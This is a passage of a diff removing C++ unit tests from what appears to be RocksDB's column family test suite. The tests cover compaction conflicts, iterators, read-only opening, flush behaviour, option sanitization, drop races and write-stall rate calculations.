-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 3;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- level style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:2"},
-       {"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:5"},
-       {"ColumnFamilyTest::ManualAuto:3", "ColumnFamilyTest::ManualAuto:2"},
-       {"LevelCompactionPicker::PickCompactionBySize:0",
-        "ColumnFamilyTest::ManualAuto:3"},
-       {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:5");
-
-  // Add more L0 files and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(one.level0_file_num_compaction_trigger + i),
-                        1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:1");
-
-  threads.join();
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("0,1", 1);
-
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-// This test checks for automatic getting a conflict if there is a
-// manual which has not yet been scheduled.
-// The manual compaction waits in NotScheduled
-// We generate more files and then trigger an automatic compaction
-// This will wait because there is an unscheduled manual compaction.
-// Once the conflict is hit, the manual compaction starts and ends
-// Then another automatic will start and end.
-TEST_F(ColumnFamilyTest, SameCFManualAutomaticConflict) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::BackgroundCompaction()::Conflict",
-        "ColumnFamilyTest::ManualAutoCon:7"},
-       {"ColumnFamilyTest::ManualAutoCon:9",
-        "ColumnFamilyTest::ManualAutoCon:8"},
-       {"ColumnFamilyTest::ManualAutoCon:2",
-        "ColumnFamilyTest::ManualAutoCon:6"},
-       {"ColumnFamilyTest::ManualAutoCon:4",
-        "ColumnFamilyTest::ManualAutoCon:5"},
-       {"ColumnFamilyTest::ManualAutoCon:1",
-        "ColumnFamilyTest::ManualAutoCon:2"},
-       {"ColumnFamilyTest::ManualAutoCon:1",
-        "ColumnFamilyTest::ManualAutoCon:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:3");
-        } else if (cf_1_2) {
-          cf_1_2 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:2");
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::RunManualCompaction:NotScheduled", [&](void* arg) {
-        InstrumentedMutex* mutex = static_cast<InstrumentedMutex*>(arg);
-        mutex->Unlock();
-        TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:9");
-        TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:7");
-        mutex->Lock();
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-    TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:6");
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:8");
-  WaitForFlush(1);
-
-  // Add more L0 files and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(one.level0_file_num_compaction_trigger + i),
-                        1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:5");
-  // Add more L0 files and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-  }
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:1");
-
-  threads.join();
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  ASSERT_LE(NumTableFilesAtLevel(0, 1), 3);
-
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-// In this test, we generate enough files to trigger automatic compactions.
-// The automatic compaction waits in NonTrivial:AfterRun
-// We generate more files and then trigger an automatic compaction
-// This will wait because the automatic compaction has files it needs.
-// Once the conflict is hit, the automatic compaction starts and ends
-// Then the manual will run and end.
-TEST_F(ColumnFamilyTest, SameCFAutomaticManualCompactions) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::AutoManual:4", "ColumnFamilyTest::AutoManual:2"},
-       {"ColumnFamilyTest::AutoManual:4", "ColumnFamilyTest::AutoManual:5"},
-       {"CompactionPicker::CompactRange:Conflict",
-        "ColumnFamilyTest::AutoManual:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:5");
-
-  // Add another L0 file and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-  }
-
-  CompactRangeOptions compact_options;
-  compact_options.exclusive_manual_compaction = false;
-  ASSERT_OK(db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-
-  TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:1");
-
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // Tailing interator not supported
-namespace {
-std::string IterStatus(Iterator* iter) {
-  std::string result;
-  if (iter->Valid()) {
-    result = iter->key().ToString() + "->" + iter->value().ToString();
-  } else {
-    result = "(invalid)";
-  }
-  return result;
-}
-}  // anonymous namespace
-
-TEST_F(ColumnFamilyTest, NewIteratorsTest) {
-  // iter == 0 -- no tailing
-  // iter == 2 -- tailing
-  for (int iter = 0; iter < 2; ++iter) {
-    Open();
-    CreateColumnFamiliesAndReopen({"one", "two"});
-    ASSERT_OK(Put(0, "a", "b"));
-    ASSERT_OK(Put(1, "b", "a"));
-    ASSERT_OK(Put(2, "c", "m"));
-    ASSERT_OK(Put(2, "v", "t"));
-    std::vector<Iterator*> iterators;
-    ReadOptions options;
-    options.tailing = (iter == 1);
-    ASSERT_OK(db_->NewIterators(options, handles_, &iterators));
-
-    for (auto it : iterators) {
-      it->SeekToFirst();
-    }
-    ASSERT_EQ(IterStatus(iterators[0]), "a->b");
-    ASSERT_EQ(IterStatus(iterators[1]), "b->a");
-    ASSERT_EQ(IterStatus(iterators[2]), "c->m");
-
-    ASSERT_OK(Put(1, "x", "x"));
-
-    for (auto it : iterators) {
-      it->Next();
-    }
-
-    ASSERT_EQ(IterStatus(iterators[0]), "(invalid)");
-    if (iter == 0) {
-      // no tailing
-      ASSERT_EQ(IterStatus(iterators[1]), "(invalid)");
-    } else {
-      // tailing
-      ASSERT_EQ(IterStatus(iterators[1]), "x->x");
-    }
-    ASSERT_EQ(IterStatus(iterators[2]), "v->t");
-
-    for (auto it : iterators) {
-      delete it;
-    }
-    Destroy();
-  }
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // ReadOnlyDB is not supported
-TEST_F(ColumnFamilyTest, ReadOnlyDBTest) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two", "three", "four"});
-  ASSERT_OK(Put(0, "a", "b"));
-  ASSERT_OK(Put(1, "foo", "bla"));
-  ASSERT_OK(Put(2, "foo", "blabla"));
-  ASSERT_OK(Put(3, "foo", "blablabla"));
-  ASSERT_OK(Put(4, "foo", "blablablabla"));
-
-  DropColumnFamilies({2});
-  Close();
-  // open only a subset of column families
-  AssertOpenReadOnly({"default", "one", "four"});
-  ASSERT_EQ("NOT_FOUND", Get(0, "foo"));
-  ASSERT_EQ("bla", Get(1, "foo"));
-  ASSERT_EQ("blablablabla", Get(2, "foo"));
-
-
-  // test newiterators
-  {
-    std::vector<Iterator*> iterators;
-    ASSERT_OK(db_->NewIterators(ReadOptions(), handles_, &iterators));
-    for (auto it : iterators) {
-      it->SeekToFirst();
-    }
-    ASSERT_EQ(IterStatus(iterators[0]), "a->b");
-    ASSERT_EQ(IterStatus(iterators[1]), "foo->bla");
-    ASSERT_EQ(IterStatus(iterators[2]), "foo->blablablabla");
-    for (auto it : iterators) {
-      it->Next();
-    }
-    ASSERT_EQ(IterStatus(iterators[0]), "(invalid)");
-    ASSERT_EQ(IterStatus(iterators[1]), "(invalid)");
-    ASSERT_EQ(IterStatus(iterators[2]), "(invalid)");
-
-    for (auto it : iterators) {
-      delete it;
-    }
-  }
-
-  Close();
-  // can't open dropped column family
-  Status s = OpenReadOnly({"default", "one", "two"});
-  ASSERT_TRUE(!s.ok());
-
-  // Can't open without specifying default column family
-  s = OpenReadOnly({"one", "four"});
-  ASSERT_TRUE(!s.ok());
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  //  WaitForFlush() is not supported in lite
-TEST_F(ColumnFamilyTest, DontRollEmptyLogs) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two", "three", "four"});
-
-  for (size_t i = 0; i < handles_.size(); ++i) {
-    PutRandomData(static_cast<int>(i), 10, 100);
-  }
-  int num_writable_file_start = env_->GetNumberOfNewWritableFileCalls();
-  // this will trigger the flushes
-  for (int i = 0; i <= 4; ++i) {
-    ASSERT_OK(Flush(i));
-  }
-
-  for (int i = 0; i < 4; ++i) {
-    WaitForFlush(i);
-  }
-  int total_new_writable_files =
-      env_->GetNumberOfNewWritableFileCalls() - num_writable_file_start;
-  ASSERT_EQ(static_cast<size_t>(total_new_writable_files), handles_.size() + 1);
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  //  WaitForCompaction() is not supported in lite
-TEST_F(ColumnFamilyTest, FlushStaleColumnFamilies) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  default_cf.write_buffer_size = 100000;  // small write buffer size
-  default_cf.arena_block_size = 4096;
-  default_cf.disable_auto_compactions = true;
-  one.disable_auto_compactions = true;
-  two.disable_auto_compactions = true;
-  db_options_.max_total_wal_size = 210000;
-
-  Reopen({default_cf, one, two});
-
-  PutRandomData(2, 1, 10);  // 10 bytes
-  for (int i = 0; i < 2; ++i) {
-    PutRandomData(0, 100, 1000);  // flush
-    WaitForFlush(0);
-
-    AssertCountLiveFiles(i + 1);
-  }
-  // third flush. now, CF [two] should be detected as stale and flushed
-  // column family 1 should not be flushed since it's empty
-  PutRandomData(0, 100, 1000);  // flush
-  WaitForFlush(0);
-  WaitForFlush(2);
-  // 3 files for default column families, 1 file for column family [two], zero
-  // files for column family [one], because it's empty
-  AssertCountLiveFiles(4);
-
-  Flush(0);
-  ASSERT_EQ(0, dbfull()->TEST_total_log_size());
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(ColumnFamilyTest, CreateMissingColumnFamilies) {
-  Status s = TryOpen({"one", "two"});
-  ASSERT_TRUE(!s.ok());
-  db_options_.create_missing_column_families = true;
-  s = TryOpen({"default", "one", "two"});
-  ASSERT_TRUE(s.ok());
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, SanitizeOptions) {
-  DBOptions db_options;
-  for (int s = kCompactionStyleLevel; s <= kCompactionStyleUniversal; ++s) {
-    for (int l = 0; l <= 2; l++) {
-      for (int i = 1; i <= 3; i++) {
-        for (int j = 1; j <= 3; j++) {
-          for (int k = 1; k <= 3; k++) {
-            ColumnFamilyOptions original;
-            original.compaction_style = static_cast<CompactionStyle>(s);
-            original.num_levels = l;
-            original.level0_stop_writes_trigger = i;
-            original.level0_slowdown_writes_trigger = j;
-            original.level0_file_num_compaction_trigger = k;
-            original.write_buffer_size =
-                l * 4 * 1024 * 1024 + i * 1024 * 1024 + j * 1024 + k;
-
-            ColumnFamilyOptions result =
-                SanitizeOptions(ImmutableDBOptions(db_options), original);
-            ASSERT_TRUE(result.level0_stop_writes_trigger >=
-                        result.level0_slowdown_writes_trigger);
-            ASSERT_TRUE(result.level0_slowdown_writes_trigger >=
-                        result.level0_file_num_compaction_trigger);
-            ASSERT_TRUE(result.level0_file_num_compaction_trigger ==
-                        original.level0_file_num_compaction_trigger);
-            if (s == kCompactionStyleLevel) {
-              ASSERT_GE(result.num_levels, 2);
-            } else {
-              ASSERT_GE(result.num_levels, 1);
-              if (original.num_levels >= 1) {
-                ASSERT_EQ(result.num_levels, original.num_levels);
-              }
-            }
-
-            // Make sure Sanitize options sets arena_block_size to 1/8 of
-            // the write_buffer_size, rounded up to a multiple of 4k.
-            size_t expected_arena_block_size =
-                l * 4 * 1024 * 1024 / 8 + i * 1024 * 1024 / 8;
-            if (j + k != 0) {
-              // not a multiple of 4k, round up 4k
-              expected_arena_block_size += 4 * 1024;
-            }
-            ASSERT_EQ(expected_arena_block_size, result.arena_block_size);
-          }
-        }
-      }
-    }
-  }
-}
-
-TEST_F(ColumnFamilyTest, ReadDroppedColumnFamily) {
-  // iter 0 -- drop CF, don't reopen
-  // iter 1 -- delete CF, reopen
-  for (int iter = 0; iter < 2; ++iter) {
-    db_options_.create_missing_column_families = true;
-    db_options_.max_open_files = 20;
-    // delete obsolete files always
-    db_options_.delete_obsolete_files_period_micros = 0;
-    Open({"default", "one", "two"});
-    ColumnFamilyOptions options;
-    options.level0_file_num_compaction_trigger = 100;
-    options.level0_slowdown_writes_trigger = 200;
-    options.level0_stop_writes_trigger = 200;
-    options.write_buffer_size = 100000;  // small write buffer size
-    Reopen({options, options, options});
-
-    // 1MB should create ~10 files for each CF
-    int kKeysNum = 10000;
-    PutRandomData(0, kKeysNum, 100);
-    PutRandomData(1, kKeysNum, 100);
-    PutRandomData(2, kKeysNum, 100);
-
-    {
-      std::unique_ptr<Iterator> iterator(
-          db_->NewIterator(ReadOptions(), handles_[2]));
-      iterator->SeekToFirst();
-
-      if (iter == 0) {
-        // Drop CF two
-        ASSERT_OK(db_->DropColumnFamily(handles_[2]));
-      } else {
-        // delete CF two
-        db_->DestroyColumnFamilyHandle(handles_[2]);
-        handles_[2] = nullptr;
-      }
-      // Make sure iterator created can still be used.
-      int count = 0;
-      for (; iterator->Valid(); iterator->Next()) {
-        ASSERT_OK(iterator->status());
-        ++count;
-      }
-      ASSERT_OK(iterator->status());
-      ASSERT_EQ(count, kKeysNum);
-    }
-
-    // Add bunch more data to other CFs
-    PutRandomData(0, kKeysNum, 100);
-    PutRandomData(1, kKeysNum, 100);
-
-    if (iter == 1) {
-      Reopen();
-    }
-
-    // Since we didn't delete CF handle, RocksDB's contract guarantees that
-    // we're still able to read dropped CF
-    for (int i = 0; i < 3; ++i) {
-      std::unique_ptr<Iterator> iterator(
-          db_->NewIterator(ReadOptions(), handles_[i]));
-      int count = 0;
-      for (iterator->SeekToFirst(); iterator->Valid(); iterator->Next()) {
-        ASSERT_OK(iterator->status());
-        ++count;
-      }
-      ASSERT_OK(iterator->status());
-      ASSERT_EQ(count, kKeysNum * ((i == 2) ? 1 : 2));
-    }
-
-    Close();
-    Destroy();
-  }
-}
-
-TEST_F(ColumnFamilyTest, FlushAndDropRaceCondition) {
-  db_options_.create_missing_column_families = true;
-  Open({"default", "one"});
-  ColumnFamilyOptions options;
-  options.level0_file_num_compaction_trigger = 100;
-  options.level0_slowdown_writes_trigger = 200;
-  options.level0_stop_writes_trigger = 200;
-  options.max_write_buffer_number = 20;
-  options.write_buffer_size = 100000;  // small write buffer size
-  Reopen({options, options});
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"VersionSet::LogAndApply::ColumnFamilyDrop:0",
-        "FlushJob::WriteLevel0Table"},
-       {"VersionSet::LogAndApply::ColumnFamilyDrop:1",
-        "FlushJob::InstallResults"},
-       {"FlushJob::InstallResults",
-        "VersionSet::LogAndApply::ColumnFamilyDrop:2"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  test::SleepingBackgroundTask sleeping_task;
-
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-
-  // 1MB should create ~10 files for each CF
-  int kKeysNum = 10000;
-  PutRandomData(1, kKeysNum, 100);
-
-  std::vector<port::Thread> threads;
-  threads.emplace_back([&] { ASSERT_OK(db_->DropColumnFamily(handles_[1])); });
-
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-  sleeping_task.Reset();
-  // now we sleep again. this is just so we're certain that flush job finished
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-
-  {
-    // Since we didn't delete CF handle, RocksDB's contract guarantees that
-    // we're still able to read dropped CF
-    std::unique_ptr<Iterator> iterator(
-        db_->NewIterator(ReadOptions(), handles_[1]));
-    int count = 0;
-    for (iterator->SeekToFirst(); iterator->Valid(); iterator->Next()) {
-      ASSERT_OK(iterator->status());
-      ++count;
-    }
-    ASSERT_OK(iterator->status());
-    ASSERT_EQ(count, kKeysNum);
-  }
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  Close();
-  Destroy();
-}
-
-#ifndef ROCKSDB_LITE
-// skipped as persisting options is not supported in ROCKSDB_LITE
-namespace {
-std::atomic<int> test_stage(0);
-const int kMainThreadStartPersistingOptionsFile = 1;
-const int kChildThreadFinishDroppingColumnFamily = 2;
-const int kChildThreadWaitingMainThreadPersistOptions = 3;
-void DropSingleColumnFamily(ColumnFamilyTest* cf_test, int cf_id,
-                            std::vector<Comparator*>* comparators) {
-  while (test_stage < kMainThreadStartPersistingOptionsFile) {
-    Env::Default()->SleepForMicroseconds(100);
-  }
-  cf_test->DropColumnFamilies({cf_id});
-  if ((*comparators)[cf_id]) {
-    delete (*comparators)[cf_id];
-    (*comparators)[cf_id] = nullptr;
-  }
-  test_stage = kChildThreadFinishDroppingColumnFamily;
-}
-}  // namespace
-
-TEST_F(ColumnFamilyTest, CreateAndDropRace) {
-  const int kCfCount = 5;
-  std::vector<ColumnFamilyOptions> cf_opts;
-  std::vector<Comparator*> comparators;
-  for (int i = 0; i < kCfCount; ++i) {
-    cf_opts.emplace_back();
-    comparators.push_back(new test::SimpleSuffixReverseComparator());
-    cf_opts.back().comparator = comparators.back();
-  }
-  db_options_.create_if_missing = true;
-  db_options_.create_missing_column_families = true;
-
-  auto main_thread_id = std::this_thread::get_id();
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("PersistRocksDBOptions:start",
-                                                 [&](void* arg) {
-    auto current_thread_id = std::this_thread::get_id();
-    // If it's the main thread hitting this sync-point, then it
-    // will be blocked until some other thread update the test_stage.
-    if (main_thread_id == current_thread_id) {
-      test_stage = kMainThreadStartPersistingOptionsFile;
-      while (test_stage < kChildThreadFinishDroppingColumnFamily) {
-        Env::Default()->SleepForMicroseconds(100);
-      }
-    }
-  });
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "WriteThread::EnterUnbatched:Wait", [&](void* arg) {
-        // This means a thread doing DropColumnFamily() is waiting for
-        // other thread to finish persisting options.
-        // In such case, we update the test_stage to unblock the main thread.
-        test_stage = kChildThreadWaitingMainThreadPersistOptions;
-
-        // Note that based on the test setting, this must not be the
-        // main thread.
-        ASSERT_NE(main_thread_id, std::this_thread::get_id());
-      });
-
-  // Create a database with four column families
-  Open({"default", "one", "two", "three"},
-       {cf_opts[0], cf_opts[1], cf_opts[2], cf_opts[3]});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Start a thread that will drop the first column family
-  // and its comparator
-  rocksdb::port::Thread drop_cf_thread(DropSingleColumnFamily, this, 1, &comparators);
-
-  DropColumnFamilies({2});
-
-  drop_cf_thread.join();
-  Close();
-  Destroy();
-  for (auto* comparator : comparators) {
-    if (comparator) {
-      delete comparator;
-    }
-  }
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(ColumnFamilyTest, WriteStallSingleColumnFamily) {
-  const uint64_t kBaseRate = 800000u;
-  db_options_.delayed_write_rate = kBaseRate;
-  db_options_.max_background_compactions = 6;
-
-  Open({"default"});
-  ColumnFamilyData* cfd =
-      static_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())->cfd();
-
-  VersionStorageInfo* vstorage = cfd->current()->storage_info();
-
-  MutableCFOptions mutable_cf_options(column_family_options_);
-
-  mutable_cf_options.level0_slowdown_writes_trigger = 20;
-  mutable_cf_options.level0_stop_writes_trigger = 10000;
-  mutable_cf_options.soft_pending_compaction_bytes_limit = 200;
-  mutable_cf_options.hard_pending_compaction_bytes_limit = 2000;
-  mutable_cf_options.disable_auto_compactions = false;
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(50);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(201);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(400);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(500);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(450);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(205);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(202);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(201);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(198);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(399);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(599);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(2001);
